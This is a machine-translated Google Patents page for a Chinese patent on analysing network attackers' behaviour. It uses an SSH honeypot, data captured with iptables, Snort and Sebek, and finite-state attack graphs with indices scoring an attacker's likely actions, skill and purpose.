CN106534195B - A kind of network attack person's behavior analysis method based on attack graph - Google Patents
A kind of network attack person's behavior analysis method based on attack graph Download PDFInfo
- Publication number
- CN106534195B CN106534195B CN201611178439.9A CN201611178439A CN106534195B CN 106534195 B CN106534195 B CN 106534195B CN 201611178439 A CN201611178439 A CN 201611178439A CN 106534195 B CN106534195 B CN 106534195B
- Authority
- CN
- China
- Prior art keywords
- attack
- attacker
- state
- network
- index
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1483—Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention discloses a kind of network attack person's behavior analysis method based on attack graph includes the following steps: to construct attack analysis model, attracts the attack of attacker;Attack data are comprehensively captured using data capture mechanism;Attack state transition diagram is generated in conjunction with finite state machine, then by index, the level of skill index of attacker, the purpose index of attacker a possibility that attack come the behavior of analytical attack person.It can be designed the present invention is based on the network attack person behavior analysis method of attack graph for Active Defending System Against and establish excellent basis, it can not only defending against network attacks, and attack can also be prevented before network attack and filter out a part of attack, effectively prevent the network crime, improves defence efficiency, reduces defence cost.
Description
Technical field
The present invention relates to active attack system of defense fields, and in particular to a kind of network attack person's behavior based on attack graph
Analysis method.
Background technique
With the rapid development of computer network, the mode of network attack is more and more.Traditional network intrusion prevention skill
Art, such as firewall, intruding detection system have been difficult to cope with the attack means to emerge one after another.Especially these practical skills
Art is mostly Passive Defence type, cannot be on the defensive in time to most emerging attack.Although firewall is in certain journey
It can prevent the attack of network on degree and improve the safety of network, but is with the development of cyber-attack techniques and tool continuous
Occur, the weakness of firewall will be exposed at leisure, and attacker can easily break through this layer of protection, another is fatal
Defect is can not to protect the attack of virus.Intrusion detection is the detection to intrusion behavior, it can be by the network row that is collected into
For, log information, communication data detect and monitoring system invasion the intrusion behavior of analyzing invader.But due to invasion
Detection system rule database and Intrusion analysis module will will constantly change with the emergence of new attack technology, simultaneously
The system is unable to the attack not having in detected rule library, and intrusion detection, which will appear, cannot timely respond to and respond mistake to attack
Phenomenon.For this purpose, an Active Defending System Against based on attack analysis is particularly important.The present invention is based on the nets of attack graph
Network attack behavior analysis method can design for Active Defending System Against establishes excellent basis.
Summary of the invention
It is an object of the present invention to provide a kind of network attack person's behavior analysis method based on attack graph, to solve the prior art
Deficiency.
The invention adopts the following technical scheme:
A kind of network attack person's behavior analysis method based on attack graph, includes the following steps:
1) attack analysis model, is constructed, the attack of attacker is attracted;
2), data collection: attack data are comprehensively captured using data capture mechanism;
3), behavioural analysis: in conjunction with finite state machine principle use state machine in node indicate the state that reaches of attack,
According to the sequence of attack time, and using the transfer of attack changed to indicate state, by monitoring attacker in real time
Attack, the attack process of attacker is depicted in conjunction with finite state machine, to generate attack state transition diagram;Pass through again
A possibility that attack index, the level of skill index of attacker, the purpose index of the attacker person that comes analytical attack behavior.
Further, in step 1) network structure of attack analysis model by SSH gateway, host and controller
Composition is divided into three network segments, forms master slave architectures;SSH gateway and host Series machine are in honey jar network segment, host series
Machine and controller are in management network segment, and SSH gateway and controller are in internet network segment, these three network segments pass through three exchanges
Machine is connected, to be modeled to true mainframe network, each class behavior attack is inveigled to interact with honey jar host.
Further, SSH gateway is to carry out safety verification to visitor's password or key by SSH agreement;Host is
By constructing OpenVZ, the Virtual Private Server of multiple isolation is created on it and in the multiple virtual machines of internal build, each
Virtual machine internal is (SuSE) Linux OS;Controller is the collection and processing to attack data.
Further, data capture mechanism in step 2): the data record of attacker's attack is anti-by iptables first
Wall with flues records the connection that it is flowed into, and then directly skips snort_inline, but Snort will record lower whole outflow
Information;On honey jar host, by disposing the client of Sebek, the attack of attacker on it is recorded, and will
The information being recorded is sent to Sebek server.
Further, the process that attack state transition diagram is generated in step 3) is as follows:
31) the original state set i.e. S of attack, is established0;
32) attack line set attack_state, is established;From original state S0Start monitor attacker each attack
Behavior is hit, is added to the state that node state changes or itself changes in attack_state, and each edge is given to assign
The weighted value W of quantization;
33), the connection of attacker does not disconnect, repeats operation 32);
34), attacker and the connection of honey jar host disconnect, and generate state transition diagram and add in the most conjunction of attack_state
Upper end state Se。
Further, index a possibility that attack in step 3): the attack state transition diagram for passing through generation counts life
At the possibility probability of happening of each state: being set from a state to another shape probability of state from Si-1State is to SiState
Transition probability is pk, k=1,2 ..., i, then a possibility that current attack are as follows:
Further, in step 3) attacker level of skill index: by following four standard come comprehensive analysis attack
The level of skill of person, and giving a mark to the attacker for the condition that meets: a, whether attacker is concerned about is found b, before attack,
Whether attacker is concerned about whether the environment c of target, attacker can be to being broken to the familiarity d of Malware, attacker
Computer takes certain safeguard measure.
Further, according to four standard formulations can mark standard include: 1. hide: to log in when journal file deletion
Or cancel, it is assessed by attacker the hiding quantity ratio of journal file is logged in;2. restoring deleted document: to deleted
File is restored, and is assessed by the quantity ratio of the deleted file of recovery;3. deleting downloading file: when downloading uses rogue
It is deleted after software, 0 is denoted as if deleted, is denoted as 1 otherwise to assess;4. checking active user: currently whether having it to system
His user checks, by assessing other users are checked whether there is;5. the system of inspection: configuration and state to system into
Row observation, is denoted as 1 if being detected, is otherwise 0;6. editing configuration file: in the whole process, by rogue software to matching
It sets file to modify, is otherwise 0 if modification is denoted as 1;7. change system: being repaired to the configuration file or state of system
Change, if change is denoted as 1;It otherwise is 0;8. creating new user: increase new username and password, be denoted as 1 if increased, otherwise for
0;9. installing rogue software: attacker installs rogue software in target machine, is denoted as 1 if installed, and is otherwise 0;10. changing
Become password: modifying to user password, is otherwise 0 if modification is denoted as 1.
Further, the purpose index of attacker is the different rogue softwares used by screening attacker in step 3)
To deduce the attack purpose of attacker.
Beneficial effects of the present invention:
1, the present invention attracts the attack of attacker by building attack analysis model;Utilize data capture machine
System comprehensively captures attack data;Attack state transition diagram is generated in conjunction with finite state machine, then passes through attack
The behavior of possibility index, the level of skill index of attacker, the purpose index of attacker come analytical attack person.The present invention passes through
Inner link, rule and the dynamic spy between various attacks can be deeply sought to the analysis of attack
Property, to predict attack, Active defense System is constructed, this is whole to finding and portraying network safety event and raising
Protection of Network Security ability has very important significance.
2, it can design and establish for Active Defending System Against the present invention is based on the network attack person behavior analysis method of attack graph
Excellent basis, can not only defending against network attacks, and attack can also be prevented and be screened before network attack
A part attack out effectively prevents the network crime, improves defence efficiency, reduces defence cost.
Detailed description of the invention
Fig. 1 is the method for the present invention flow diagram.
Fig. 2 is the on-premise network structure chart of attack analysis model.
Fig. 3 is data capture mechanism system figure.
Fig. 4 is finite state machine status conversion figure.
Fig. 5 is network attack person behavioural analysis figure.
Specific embodiment
The present invention is done below with reference to embodiment and attached drawing and is further explained.The following example is merely to illustrate this hair
It is bright, but be not used to limit practical range of the invention.
A kind of network attack person's behavior analysis method based on attack graph, as shown in Figure 1, including the following steps:
1) attack analysis model, is constructed, the attack of attacker is attracted.Attack analysis model is honey
The on-premise network structure chart of tank is as shown in Fig. 2, by SSH gateway (SSH Gateway), host (Host) and controller
(Collector) it forms, they are divided into three network segments, form master slave architectures;SSH gateway and host Series machine are in honey
Tank network segment, host Series machine and controller are in management network segment, and SSH gateway and controller are in internet network segment, these three
Network segment is connected by three interchangers, to be modeled to true mainframe network, inveigle each class behavior attack and honey jar host into
Row interaction.Wherein, SSH gateway is to carry out safety verification to visitor's password or key by SSH agreement.Host is to pass through structure
OpenVZ is built, creates the Virtual Private Server (VPS) of multiple isolation on it and in the multiple virtual machines of internal build, Mei Gexu
Inside quasi- machine is (SuSE) Linux OS, and since linux system is open source, attacker ponders this system more, is more held
Easily find that security breaches therein are attacked.Core of the controller as the model, the mainly receipts to attack data
Collection and processing.
2), data collection: attack data are comprehensively captured using data capture mechanism.The configuration mesh of honey pot system
And meaning rely primarily on data and acquire to embody, detailed capture data are capable of the attack process of replay attacks person.It utilizes
Data capture mechanism comprehensively captures attack data, to guarantee that the behavioural analysis for next stage provides detailed letter
Breath.Data capture mechanism system is as shown in figure 3, the data record of attacker's attack passes through iptables firewall first and flows to it
The connection entered is recorded, and then directly skips snort_inline, but Snort will record lower whole outflow information, thus
It can be used for attack analysis;On honey jar host, by disposing the client of Sebek, to the attack of attacker on it
It is recorded, and sends Sebek server for the information being recorded.
3), behavioural analysis: the behavioural analysis based on attack graph, mainly in combination in the principle use state machine of finite state machine
Node indicate the state that reaches of attack, indicate state according to the sequence of attack time, and using changing for attack
Transfer, by monitoring the attack of attacker in real time, the attack process of attacker is depicted in conjunction with finite state machine, thus
Generate attack state transition diagram;A possibility that passing through attack again index, the level of skill index of attacker, attacker mesh
The index person that comes analytical attack behavior.
The related definition of the finite state machine of attack is given below;
The finite state machine for defining 1 (attack state machine) attack can define 3 tuples: M={ S, Σ, δ } its
In, S is the set of attack finite state, and ∑ is event sets, and δ is attack state transition function, it be a S ×
The mapping function of Σ → S;
The successful attack in 2 (node) phagocytic processes according to current state and front is defined, invader may reach
The next possible attack state arrived;
Defining attacker in 3 (side) finite state machines takes any attack by attack state transition function from one
State such as installs new rogue software to the connection between another state, increases loophole etc.;
Define a paths i.e. one section attack sequence in 4 (attack route) attack state diagrams, initial state S0∈S,
Terminate at Se∈S;Such as an attack route can indicate S1→S2→...→Si→...Se;
The attack purpose for defining 5 (attack purpose) attackers is expressed as Dgoal, the honey pot system invader for deployment is
The attack route for reaching attack purpose is Sunsafe, then attacking state diagram is exactly to indicate from S0To DgoalAll SunsafeCollection
It closes.
Understand in conjunction with the analysis to honey pot system attack, and to the status of network system, invades honey jar from attacker
The attack issued when host is original state, is end state until attacker exits honey jar host, finds out all attackers'
Attack route.
State transition diagram generating algorithm:
Input: M={ S, Σ, δ } // finite state machine model;
Output: G//attack state diagram.
The process for generating attack state transition diagram is as follows:
31) the original state set i.e. S of attack, is established0;
32) attack line set attack_state, is established;From original state S0Start monitor attacker each attack
Behavior is hit, is added to the state that node state changes or itself changes in attack_state, and each edge is given to assign
The weighted value W of quantization;
33), While (the non-Duan Kai &&attack_state- > next of the connection of attacker be not empty) repeats 32) operation;
34), If (attacker connect disconnection with honey jar host) generate state transition diagram and attack_state most
It closes and adds end state Se。
It is as follows to the relevant command history of state transfer:
M (s): the set of modification system file order;H (s): checking and modifies login log order, hiding attack trace;
D (s): download command set;I (s): installation software and program command set;R (s): operation Malware and program command collection
It closes;CH (s): system hardware and software message command set is checked;C (s): new user and Modify password command history are created.Limited shape
State machine condition conversion is as shown in Figure 4.
Due to the uncertainty of attack, it is impossible to which the behavior for assessing attacker by subjective conjecture is this
A possibility that invention is by formulating following three indexs come the behavior of analytical attack person, being respectively as follows: attack index, attacker
Level of skill index, the purpose index of attacker.
A possibility that attack index: the attack state transition diagram statistics for passing through generation generates the possibility hair of each state
Raw probability, it is assumed that set from a state to another shape probability of state from Si-1State is to SiThe transition probability of state is pk, k=
1,2 ..., i, then a possibility that current attack are as follows:
The level of skill index of attacker: by formulating the more common standard of following four come comprehensive analysis attacker's
Level of skill, and give a mark to the attacker for the condition that meets:
A, whether attacker is concerned about and is found
It is more careful that usually this kind of attacker acts, and whether he, which is concerned about, from the point of view of fixed four standards is found.I, it deletes and includes
The journal file of attacker's activity trail;If II, deleting journal file, attacker would generally have found that journal file is reduced,
They will restore journal file;III, in attack, they can also check whether system has other users using;
IV, the file that they can also imported into machine oneself from internet are deleted.
B, before attack, whether attacker is concerned about the environment of target
Formulate two standards: I, attacker can or can not understand target machine before attack, and whether there are also to environment
(especially network environment) concern;II, whether paid close attention to the presence of other users before attack.
C, familiarity of the attacker to Malware
Formulate three standards: I, see attacker to rogue software whether familiar with understanding, caing be compared to some Malwares has net
Network function, and he has been installed in the target machine that the network port is blocked;II, when installing rogue software, attack
Whether person can modify the configuration file of system;Whether III, attacker finally install rogue software successfully and have modified entire
System.
D, whether attacker can take the computer being broken certain safeguard measure
I, if some attacker has broken through a certain machine by Brute Force, and he attack is still next time
By Brute Force, then turning out the account credentials of the usemame/password for the machine that this attacker has shot oneself
It is weaker;Conversely, stronger.II, see that attacker can or can not build a new username and password after shooting in order to next
Secondary login.
The present invention according to the deployment of system, for attacker technical capability evaluation formulate it is a series of can mark it is quasi-, it is main to wrap
Include: 1. hide: deletion or cancellation to journal file when logging in, what this can hide login journal file by attacker
Quantity ratio is assessed;2. restoring deleted document: restoring to deleted file, this can pass through the deleted text of recovery
The quantity ratio of part is assessed;3. deleting downloading file: when downloading is using it is deleted after rogue software, if this can pass through deletion
It is denoted as 0, is denoted as 1 otherwise to assess;4. checking active user: currently whether thering are other users to check system, this can be with
By assessing other users are checked whether there is;5. the system of inspection: observing the configuration and state of system, if tested
Survey is just denoted as 1, is otherwise 0;6. editor's configuration file: in the whole process, modified by rogue software to configuration file,
It is otherwise 0 if modification is denoted as 1;7. change system: modifying to the configuration file or state of system, if change is denoted as 1;
It otherwise is 0;8. creating new user: increasing new username and password, be denoted as 1 if increased, be otherwise 0;9. it is soft to install rogue
Part: attacker installs rogue software in target machine, is denoted as 1 if installed, and is otherwise 0;10. changing password: to user
Password is modified, and is otherwise 0 if modification is denoted as 1.
The determination that attacker attacks purpose is very difficult, because wherein with a large amount of subjective factor and contingency, because
This can only provide the conjecture of attacker's target of attack from presentation.Herein, it is mainly used by examination attacker different
Rogue software deduces the attack purpose of attacker.Such as, 1. some attackers want that installing software as IRCbot comes in deadlock
A host being broken is registered in corpse network to be communicated by IRC agreement;2. installing as similar Bouncer IRC
Software carries out IP address spoofing under IRC agreement;Allow attacker with others 3. installing software as similar Backdoor
Approach is returned again;4. installing port scan tool as similar Scanner finds potential security breaches;5. downloading file
Editing machine helps him preferably to attack host using hiding script;6. installing software as similar Flooder to come
Make the data packet of other IP address transmission of large capacity, so that them be made to refuse service etc..
The analysis of the thinking of attack graph and attack index as described above, can construct the network attack based on attack graph
Person's behavioural analysis, as shown in Figure 5.
Claims (3)
1. a kind of network attack person's behavior analysis method based on attack graph, which comprises the steps of:
1) attack analysis model, is constructed, the attack of attacker is attracted;The network knot of attack analysis model
Structure is made of SSH gateway, host and controller, is divided into three network segments, forms master slave architectures;SSH gateway and host series
Machine is in honey jar network segment, and host Series machine and controller are in management network segment, and SSH gateway and controller are in internet net
Section, these three network segments are connected by three interchangers, to be modeled to true mainframe network, inveigle each class behavior attack and honey
Tank host interacts;
2), data collection: attack data are comprehensively captured using data capture mechanism;Data capture mechanism: attacker
The data record of attack passes through iptables firewall first and records to the connection that it is flowed into, and then directly skips snort_
Inline, but Snort will record lower whole outflow information;On honey jar host, by disposing the client of Sebek, attack against each other
The attack of the person of hitting on it is recorded, and sends Sebek server for the information being recorded;
3), behavioural analysis: in conjunction with finite state machine principle use state machine in node indicate the state that reaches of attack, according to
The sequence of attack time, and using the transfer of attack changed to indicate state, by monitoring attacking for attacker in real time
Behavior is hit, the attack process of attacker is depicted in conjunction with finite state machine, to generate attack state transition diagram;Pass through attack again
A possibility that behavior index, the level of skill index of attacker, the purpose index of the attacker person that comes analytical attack behavior;
Wherein, the process for generating attack state transition diagram is as follows:
31) the original state set i.e. S of attack, is established0;
32) attack line set attack_state, is established;From original state S0Each attack for starting to monitor attacker is gone
To be added to the state that node state changes or itself changes in attack_state, and give each edge to assign and quantify
Weighted value W;
33), the connection of attacker does not disconnect, repeats operation 32);
34), attacker and the connection of honey jar host disconnect, and generate state transition diagram and in the most conjunction of attack_state plus knot
Pencil state Se;
A possibility that attack index: occurred by the possibility that the attack state transition diagram statistics of generation generates each state general
Rate: it is set from a state to another shape probability of state from Si-1State is to SiThe transition probability of state is pk, k=1,2 ...,
I, then a possibility that current attack are as follows:
The level of skill index of attacker: by following four standard come the level of skill of comprehensive analysis attacker, and to satisfaction
The attacker of condition gives a mark: a, whether attacker is concerned about is found b, before attack, and whether attacker is concerned about target
Whether environment c, attacker can take certain protection to arrange in the computer being broken familiarity d, the attacker of Malware
It applies;
The purpose index of attacker is to deduce the attack of attacker by screening the different rogue softwares that attacker uses
Purpose.
2. network attack person's behavior analysis method according to claim 1 based on attack graph, which is characterized in that SSH net
Pass is to carry out safety verification to visitor's password or key by SSH agreement;Host is created on it by constructing OpenVZ
Build the Virtual Private Server of multiple isolation and in the multiple virtual machines of internal build, each virtual machine internal is Linux behaviour
Make system;Controller is the collection and processing to attack data.
3. network attack person's behavior analysis method according to claim 1 based on attack graph, which is characterized in that attacker
Level of skill index according to four standard formulations can mark standard include: 1. hide: to log in when journal file deletion or
Cancel, is assessed by attacker the hiding quantity ratio of journal file is logged in;2. restoring deleted document: to deleted text
Part is restored, and is assessed by the quantity ratio of the deleted file of recovery;3. deleting downloading file: when downloading is soft using rogue
It is deleted after part, 0 is denoted as if deleted, is denoted as 1 otherwise to assess;4. checking active user: currently whether having other to system
User checks, by assessing other users are checked whether there is;5. the system of inspection: configuration and state to system carry out
Observation is denoted as 1 if being detected, is otherwise 0;6. editing configuration file: in the whole process, by rogue software to configuration
File is modified, and is otherwise 0 if modification is denoted as 1;7. change system: it modifies to the configuration file or state of system,
If change is denoted as 1;It otherwise is 0;8. creating new user: increasing new username and password, be denoted as 1 if increased, be otherwise 0;
9. installing rogue software: attacker installs rogue software in target machine, is denoted as 1 if installed, and is otherwise 0;10. changing
Password: modifying to user password, is otherwise 0 if modification is denoted as 1.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201611178439.9A CN106534195B (en) | 2016-12-19 | 2016-12-19 | A kind of network attack person's behavior analysis method based on attack graph |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201611178439.9A CN106534195B (en) | 2016-12-19 | 2016-12-19 | A kind of network attack person's behavior analysis method based on attack graph |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN106534195A CN106534195A (en) | 2017-03-22 |
| CN106534195B true CN106534195B (en) | 2019-10-08 |
Family
ID=58341118
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201611178439.9A Active CN106534195B (en) | 2016-12-19 | 2016-12-19 | A kind of network attack person's behavior analysis method based on attack graph |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN106534195B (en) |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US11824894B2 (en) | 2020-11-25 | 2023-11-21 | International Business Machines Corporation | Defense of targeted database attacks through dynamic honeypot database response generation |
Families Citing this family (17)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN108629474B (en) * | 2017-03-24 | 2021-11-12 | 北京航天计量测试技术研究所 | Process safety assessment method based on attack graph model |
| CN107317824B (en) * | 2017-08-01 | 2023-07-25 | 北京观数科技有限公司 | Real network attack and defense exercise system with controllable risk |
| CN108040070A (en) * | 2017-12-29 | 2018-05-15 | 北京奇虎科技有限公司 | A kind of network security test platform and method |
| CN110022288A (en) * | 2018-01-10 | 2019-07-16 | 贵州电网有限责任公司遵义供电局 | A kind of APT threat recognition methods |
| CN108446557B (en) * | 2018-03-12 | 2020-07-14 | 江苏中天科技软件技术有限公司 | Security threat active sensing method based on honeypot defense |
| CN108462714A (en) * | 2018-03-23 | 2018-08-28 | 中国人民解放军战略支援部队信息工程大学 | A kind of APT systems of defense and its defence method based on system resilience |
| CN108809959A (en) * | 2018-05-23 | 2018-11-13 | 郑州信大天瑞信息技术有限公司 | A kind of attack portrait method |
| CN109413109B (en) * | 2018-12-18 | 2021-03-05 | 中国人民解放军国防科技大学 | Heaven and earth integrated network oriented security state analysis method based on finite-state machine |
| CN110011982B (en) * | 2019-03-19 | 2020-08-25 | 西安交通大学 | Intelligent attack decoy system and method based on virtualization |
| CN110213301B (en) * | 2019-07-11 | 2021-09-03 | 武汉思普崚技术有限公司 | Method, server and system for transferring network attack plane |
| CN110933032B (en) * | 2019-10-25 | 2022-04-05 | 湖南麒麟信安科技股份有限公司 | SSH path tracking method, system and medium |
| CN110677438A (en) * | 2019-11-15 | 2020-01-10 | 杭州安恒信息技术股份有限公司 | Attack chain construction method, device, equipment and medium |
| CN111371758B (en) * | 2020-02-25 | 2022-03-25 | 东南大学 | Network spoofing efficiency evaluation method based on dynamic Bayesian attack graph |
| US11689568B2 (en) | 2020-05-08 | 2023-06-27 | International Business Machines Corporation | Dynamic maze honeypot response system |
| CN111885041A (en) * | 2020-07-17 | 2020-11-03 | 福建奇点时空数字科技有限公司 | Attack scene reconstruction method based on honeypot threat data |
| CN112367315B (en) * | 2020-11-03 | 2021-09-28 | 浙江大学 | Endogenous safe WAF honeypot deployment method |
| CN114285623B (en) * | 2021-12-21 | 2023-01-20 | 北京永信至诚科技股份有限公司 | Evaluation method and device for network security honeypot system indexes |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102413003A (en) * | 2010-09-20 | 2012-04-11 | 中国科学院计算技术研究所 | Method and system for detecting network security |
| CN103139220A (en) * | 2013-03-07 | 2013-06-05 | 南京理工大学常熟研究院有限公司 | Network security attack defense method using state attack and defense graph model |
| CN104348652A (en) * | 2013-08-06 | 2015-02-11 | 南京理工大学常熟研究院有限公司 | Method and device for evaluating system security based on correlation analysis |
| CN104539601A (en) * | 2014-12-19 | 2015-04-22 | 北京航空航天大学 | Reliability analysis method and system for dynamic network attack process |
| CN105681338A (en) * | 2016-03-04 | 2016-06-15 | 西北大学 | Vulnerability exploiting success probability calculation method and network security risk management method |
| CN105991521A (en) * | 2015-01-30 | 2016-10-05 | 阿里巴巴集团控股有限公司 | Network risk assessment method and network risk assessment device |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US9774616B2 (en) * | 2012-06-26 | 2017-09-26 | Oppleo Security, Inc. | Threat evaluation system and method |
-
2016
- 2016-12-19 CN CN201611178439.9A patent/CN106534195B/en active Active
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102413003A (en) * | 2010-09-20 | 2012-04-11 | 中国科学院计算技术研究所 | Method and system for detecting network security |
| CN103139220A (en) * | 2013-03-07 | 2013-06-05 | 南京理工大学常熟研究院有限公司 | Network security attack defense method using state attack and defense graph model |
| CN104348652A (en) * | 2013-08-06 | 2015-02-11 | 南京理工大学常熟研究院有限公司 | Method and device for evaluating system security based on correlation analysis |
| CN104539601A (en) * | 2014-12-19 | 2015-04-22 | 北京航空航天大学 | Reliability analysis method and system for dynamic network attack process |
| CN105991521A (en) * | 2015-01-30 | 2016-10-05 | 阿里巴巴集团控股有限公司 | Network risk assessment method and network risk assessment device |
| CN105681338A (en) * | 2016-03-04 | 2016-06-15 | 西北大学 | Vulnerability exploiting success probability calculation method and network security risk management method |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US11824894B2 (en) | 2020-11-25 | 2023-11-21 | International Business Machines Corporation | Defense of targeted database attacks through dynamic honeypot database response generation |
Also Published As
| Publication number | Publication date |
|---|---|
| CN106534195A (en) | 2017-03-22 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN106534195B (en) | A kind of network attack person's behavior analysis method based on attack graph | |
| US20210273961A1 (en) | Apparatus and method for a cyber-threat defense system | |
| CN108494810B (en) | Attack-oriented network security situation prediction method, device and system | |
| Fachkha et al. | Internet-scale Probing of CPS: Inference, Characterization and Orchestration Analysis. | |
| CN112291232B (en) | Safety capability and safety service chain management platform based on tenants | |
| CN107659543B (en) | Protection method for APT (android packet) attack of cloud platform | |
| Singh et al. | Collaborative ids framework for cloud | |
| Xu et al. | Alert correlation through triggering events and common resources | |
| KR101534194B1 (en) | cybersecurity practical training system and method that reflects the intruder behavior patterns | |
| CN106663169A (en) | System and method for high speed threat intelligence management using unsupervised machine learning and prioritization algorithms | |
| CN105959250A (en) | Network attack black list management method and device | |
| TWI476628B (en) | A malware signature-based analysis of information security risk assessment system | |
| Lahre et al. | Analyze different approaches for ids using kdd 99 data set | |
| Hu et al. | Attack scenario reconstruction approach using attack graph and alert data mining | |
| KR101991737B1 (en) | Visualization method and visualization apparatus | |
| Signorini et al. | Advise: anomaly detection tool for blockchain systems | |
| CN107454068B (en) | Honey net safety situation perception method combining immune hazard theory | |
| Wagner et al. | Agent-based simulation for assessing network security risk due to unauthorized hardware | |
| Suo et al. | Research on the application of honeypot technology in intrusion detection system | |
| CN114386042A (en) | Method suitable for deduction of power enterprise network war chess | |
| Alavizadeh et al. | A survey on threat situation awareness systems: framework, techniques, and insights | |
| CN104580087A (en) | Immune network system | |
| Zhao et al. | Network security model based on active defense and passive defense hybrid strategy | |
| Gavrilovic et al. | Snort IDS system visualization interface for alert analysis | |
| Al-Mahrouqi et al. | Efficiency of network event logs as admissible digital evidence |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |